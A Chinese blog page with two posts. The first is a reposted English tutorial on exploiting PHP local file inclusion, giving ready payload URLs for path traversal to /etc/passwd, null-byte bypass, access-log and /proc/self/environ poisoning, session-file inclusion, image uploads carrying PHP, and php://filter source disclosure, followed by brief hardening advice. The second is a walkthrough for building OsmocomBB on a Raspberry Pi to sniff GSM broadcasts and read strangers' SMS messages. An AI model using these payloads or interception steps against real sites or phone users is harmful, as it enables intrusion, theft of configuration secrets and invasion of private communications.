Wednesday, June 7, 2017

本地文件包含漏洞利用技巧

 转载自:https://ddxhunter.wordpress.com,原文标题:LFI’s Exploitation Techniques,总结得很全,但没有时间翻译,仅补了一点注释。

What’s a Local File Inclusion?

A local file inclusion (usually called “LFI”) is a webhacking technique that allow simply to include files from a local location. That means that we can include a file that is outside of the web directory (if we got rights), and execute PHP code.

<?php include($_GET['page']);?>

This code will search for the variable GET “Page”, include and execute the page specified by that GET variable. If you wan’t an example, you’ve surely already seen an website with something like “index.php?page=news.php” that’s it, that’s in a lot of case, an include. To start include file locally, we’ll use “../” that allow us to go to an directory upper than the actual one. We’ll try to include the file /etc/passwd, well, it’s not always readable but it’s a good start. We’ll use “../” to go to the root, then load /etc/passwd.

http://sitelambda.com/index.php?page=../../../../../../../../../../etc/passwd

I personally prefer using “./” before the page name to verify if there’s an exploitable local file inclusion (example: index.php?page=news.php » index.php?page=./news.php if it works, mostly there’s an LFI) but it won’t always work. Note that /etc/password will only works on Linux system.

The null byte technique.

In most cases, the webmaster will not do an include like that, he’ll prefer add himself “.php” at the end of the inclusion. (Well, we can say that index.php?p=news is prettier than index.php?p=news.php) He’ll use a code like that:

<?php include($_GET['page'].".php");?>

So, this time, the php will include again a page with the GET variable page, but it’ll add .php at the end. To bypass this restriction, we’ll use the null byte. The principe of the null byte is that it is an line terminator char. It means that everything after the null byte will be deleted. To use it, you’ll have to got a website with magic quotes off. The character urlencoded is “%00” (the browser will automatically translate it) so, for example, this time we’ll gotta use that:

http://sitelambda.com/index.php?page=../../../../../../../../../../etc/passwd%00

It’ll include /etc/passwd perfectly. The .php will be deleted by the null byte.

And now that I got a LFI, what should I do?

I actually know only 4 LFI exploitation technique, there they are:

The access.log

The principe is simple, we’ll include the log file that logs all the web connections to the server. In our case, it’ll be the access.log, but it can also be access_log, or any name in fact. (You’ll gotta see the apache/httpd configuration to know what’s the logfile name).

http://site.com/&lt;? phpinfo(); ?>

By the way, I think that the useragent is not urlencoded, so you can modify it and try with that.

The /proc/self/environ

You’ll gotta do something like that, then the server will log it inside the access_log, and when you’ll include it, the code will be executed. Note that your browser automatically urlencode your special chars, so you’ll have to go to that url with a script that won’t auto-urlencode. If you go with your browser, it’ll be something like: %3C? phpinfo(); ?%3E.

It’s my favorite one. Try to include /proc/self/environ, you will see a list of actual processus variable. (Well, if you got rights to include that file, that’s not often the case) you’ll see something like that if you’re on Mozilla:

HTTP_USER_AGENT=Mozilla/5.0

Why it is interessant? Because you’ll can change your useragent to suit the php code you want. How? Go to “about:config” (type it in your Firefox Browser), create a new line, string, with these datas: “general.useragent.override” for the name, and “” for the value. (Note that there’s some tool that do it automatically, like useragent switcher). Reload the page, and you’ll see an phpinfo instead of “Mozilla/5.0”

The PHP Sessions Exploitation.

Another exploitation is the sessions exploitation. If your site got php sessions (phpsessid, etc..) you’ll can include them and if you can modify the datas, it’ll be easy to execute code. You’ll gotta include sess_[your phpsessid value] . Most of time, it is in /tmp, but you’ll can find it sometimes in /var/lib/php5/ also, etc.. The data stored in phpsessid should be everything (like a name at a register, an option you choose).

注:PHP的Session可以在phpinfo()页面里面的session.save_path字段查看到,Debian下php5-fpm默认的Session路径是/var/lib/php5/sessions,Session文件的命名规则是:”sess_” + PHPSESSIONID,文件内容是:Session变量名 + “” + 变量类型 + “:” + 变量长度 + “:” + 变量内容 + ‘;’,例如 $_SESSION[‘test’] = ‘google’ 这个Session在文件里面就是:tests:6:”google”;
index.php?p=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7%00

I suggest you to surf a little before trying to include the phpsessid, touch at everything, modify options, etc..

The upload

We don’t often heard of it, but it’s the easiest technique. Just upload a file that contain php code, include it. Example: There’s an forum on the site you’re actually trying LFIs, upload an avatar with modified code that contain php (hexedit it, and modify only at the center of the datas, so the forum will still recognize it as an image). Found the right path, and include your avatar, tadaa, your code is executed.

Read a file with LFI

There’s a technique that will allow us to “read” a file with a LFI. (Interessant file to check should be config.php file, that normally, will only be executed, not shown). We’ll use PHP Filters to help us do it:

注:在include里面使用php伪协议需要打开php.ini里面的 allow_url_include

index.php?page=php://filter/read=convert.base64-encode/resource=config

This code will base64 the resource “config” (like if it was index.php?page=config, but with base64’d) with that, your code won’t be executed, and you’ll can base64_decode() it after to take the original config.php file. This method won’t need magic quotes but you’ll need to have a PHP Version higher or egal to PHP5.

Special cases

Sometimes, even if you can read the /etc/passwd, it is not an include. For example, when they’ll use readfile() in php, it’ll load the file, but php code won’t be executed. It’s a problem to execute php code, but well, it’ll give you an advantage on one point, you’ll can read configs file.

index.php?page=./forum/config

Then show the source of the page (CTRL+U) to have the code.

The “Does a folder exist” trick.

If you got a LFI, a good technique to know if a folder exist is simply to enter, then go out of it. Example:

index.php?page=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00

How to protect from LFIs?

Well, first, activate magic quotes, it’s not the “perfect solution”, but it’ll help. Then you should also activate open_basedir to only read into your web folder and /tmp, you should also do a function that parse the “/” , “.” and “%00” char.

But well, the best option is the non dynamic include.

if ($_GET['page'] == "news") {include("news.php");} else {include ("accueil.php");}

Saturday, February 13, 2016

Monday, April 13, 2015

Raspberry Pi上的Osmocombb

 Osmocombb的大名很久以前就有所耳闻,最近自己也搞了一套简单的硬件来玩一玩。Osmocom的全称是 Open Source mobile communication,BB是其子项目,虽然其名BB不知所云,但人家确实牛逼,把GSM通讯协议完成了开源实现。虽然其项目说GSM的硬件层还没开源,但物理层Layer1以上的Layer2和Layer3都被彻底Hack了。项目效果嘛,就是可以非常轻松地实现对GSM网络的无线电窃听,基站劫持,伪基站等等牛逼的特性。说白了,就是可以利用常见的硬件对你的手机通讯实施窃听,而且成本极低(某宝总价100RMB左右)。

之前网上有很多大牛都写过Osmocombb的参考资料,但自己的实现方案有点不同,大牛们基本都是在虚拟机上运行Linux作为Osmocombb的运行环境,而我的笔电本身就是Linux的,因为需要搭建arm-elf的交叉编译环境,个人PC上面又不想长期堆积那些一次性使用又不容易彻底删除的东西,所以我是在Raspberry Pi上面编译实现的。和网上大部分资料稍有不同,所以整理一下,做个记录。

0x00 硬件准备

自家里翻出来的多年以前的Moto C118手机,淘自某宝的MiniUSB线,C118专用刷机线,一块FT232RL板子,和最核心的Raspberry Pi(我的Pi买得比较早了,是第一代B版,这里搭载的是Rasbian操作系统)。

0x01 流程说明

先要在Pi上面编译一个arm-elf的gcc编译器,再用这个编译器编译libosmocore库作为交叉编译环境。然后再在此基础上编译Osmocombb主程序。然后在编译好的Osmocombb中会有一组用来刷入C118手机的固件,这时通过FT232连接Raspberry Pi和C118,固件刷入之,这样C118就成了一台GSM的Modem,就可以运行Osmocombb开始任性玩耍了~

0x02 建立编译环境和编译

先得SSH到Pi上面进行操作

安装依赖:

apt-get install build-essential libgmp3-dev libmpfr-dev libx11-6 libx11-dev texinfo flex bison libncurses5 libncurses5-dbg libncurses5-dev libncursesw5 libncursesw5-dbg libncursesw5-dev zlibc zlib1g-dev libmpfr4 libmpc-dev

下载编译脚本以及编译器源码:

wget http://bb.osmocom.org/trac/raw-attachment/wiki/GnuArmToolchain/gnu-arm-build.2.sh
mkdir build install src
cd src/
wget http://ftp.gnu.org/gnu/gcc/gcc-4.5.2/gcc-4.5.2.tar.bz2
wget http://ftp.gnu.org/gnu/binutils/binutils-2.21.1a.tar.bz2
wget ftp://sources.redhat.com/pub/newlib/newlib-1.19.0.tar.gz

编译:

cd ..
./gnu-arm-build.2.sh

因为是使用Raspberry Pi的原因,速度远不如PC机,我是晚上编译的,启动编译脚本之后就上床睡觉了,第二天一早检查的时候已经完成了。

把编译器的路径加到PATH:

export PATH=$PATH:~/install/bin

下载libosmocore并编译之:

git clone git://git.osmocom.org/libosmocore.git
cd libosmocore/
autoreconf -i
./configure
make
sudo make install
cd ..
sudo ldconfig

编译Osmocombb:

这个过程按别人的资料,Master版本的会编译不过,基本都是用的luca/gsmmap分支,具体细节还没深究,但是这个分支提供了可以根据sniff的数据进行LBS定位的功能(屌炸啊!)。

git clone git://git.osmocom.org/osmocom-bb.git
cd osmocom-bb
git checkout --track origin/luca/gsmmap

直接编译在Layer2和Layer3下会无法发送信号,但是如果只是实现窃听则无所谓,如果需要更高级的功能,则需要打开几个编译开关:

cd osmocom-bb/src/target/firmwire/
vi Makefile
修改如下内容:
 
<h1>Uncomment this line if you want to enable Tx (Transmit) Support.</h1>
 
-#CFLAGS +=-DCONFIG_TX_ENABLE
+CFLAGS +=-DCONFIG_TX_ENABLE

编译:

cd src/
make

0x03 连接硬件

把手机,FT232,MiniUSB线接一起,手机要在关机状态,就是一点,注意手机刷机线的黑线要接在FT232的GND上,白线和红线分别在输入(RX-I)和输出(TX-O)上,3.3V外电源接口不用。

然后在Pi上运行lsusb来查看FT232的端口,貌似通常都是ttyUSB0,我的PC上面也是。然后到osmocom-bb/src/host/osmocon目录下运行:

sudo ./osmocon -p /dev/ttyUSB0 -m c123xor ../../target/firmware/board/compal_e88/layer1.compalram.bin

0x04 刷写固件

然后按一下手机的电源键,这时程序会尝试和Modem(C118)通讯,如果没有连接问题程序会停下来,再按一下电源键就可以刷入固件了,这里刷入的固件只是会存在于手机的RAM里面,重启之后它又会变回正常的手机,刷写成功后手机显示:

0x05 开玩

固件刷入完成之后不要关闭刷写程序,因为它还要负责处理Pi和C118的通讯,再开启一个Terminal,SSH到Pi上面,进入osmocom-bb/src/host/layer23/src/misc目录,运行:

sudo ./cell_log -O

这时程序会搜索你附近的基站,

然后就可以看到扫描结果,这里的ARFCN可以理解成基站的频道编号(详细介绍:Absolute radio-frequency channel number),PWR是信号强度,MCC和MNC分别是国家编码和网络编码(详细介绍:Mobile country code),移动是00,联通是01。然后选一个你要嗅探的基站的ARFCN,再同一目录下运行:

sudo ./ccch_scan -i 127.0.0.1 -a 1

开始抓包!

然后需要把抓包内容保留下来,再开一个Terminal,SSH上去,随便找一个目录用于保存抓包记录。为了方便把记录下载到本地之后用Wireshark分析,需要在Pi上面使用dumpcap保存记录,先确保Pi上面安装了tshark(多半情况是不会在上面装Wireshark的):

sudo apt-get install tshark

然后:

sudo dumpcap -i lo -w logfile.log

按我玩了好几次的经验来说通常要抓到三五个可显示的短信结果大概要抓到2w个包左右(可能是我们学校所处太偏僻了吧~~),抓够之后用scp把Pi上面的记录下载到本地,用Wireshark打开,设置过滤器为gsm_sms:

这个是苦等了大概两个多小时的结果,解开一个:

~~短信内容直接读出~~这个feel~倍儿爽~~据说是移动和联通为了减轻运维压力把GSM的加密都关掉了,所以,你的短信都会被这些万恶的运营商明文在空中传输(奸商啊!!!)。不过话说回来,即使启用加密,GSM的A5加密算法也早就被破解了,算法都在网上挂着呢:http://mtlin.org/article/a51.html

0x06 一点后续

我这里只能捕获到基站的下行包,没法拿到手机的上行包,如果硬要拿上行包,需要硬改:参考链接。我这里没有找到上手的工具所以就跳过了这一步。还有,如果想全面地把附近的GSM都抓到,可能需要一打C118~~毕竟一台手机只能对应一个基站。

最后补一句:别拿去做坏事,做个守法好公民~~

本地文件包含漏洞利用技巧

  转载自: https://ddxhunter.wordpress.com ,原文标题: LFI’s Exploitation Techniques ,总结得很全,但没有时间翻译,仅补了一点注释。 What’s a Local File Inclusion? A local f...